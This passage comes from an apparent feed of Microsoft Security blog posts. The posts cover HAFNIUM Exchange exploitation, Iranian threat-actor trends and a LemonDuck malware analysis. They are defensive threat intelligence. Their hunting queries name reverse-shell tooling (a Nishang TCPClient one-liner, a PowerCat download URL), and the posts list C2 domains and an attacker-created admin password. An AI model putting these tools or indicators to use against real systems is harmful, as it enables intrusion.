[Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T21:46:45", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mssecure", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own 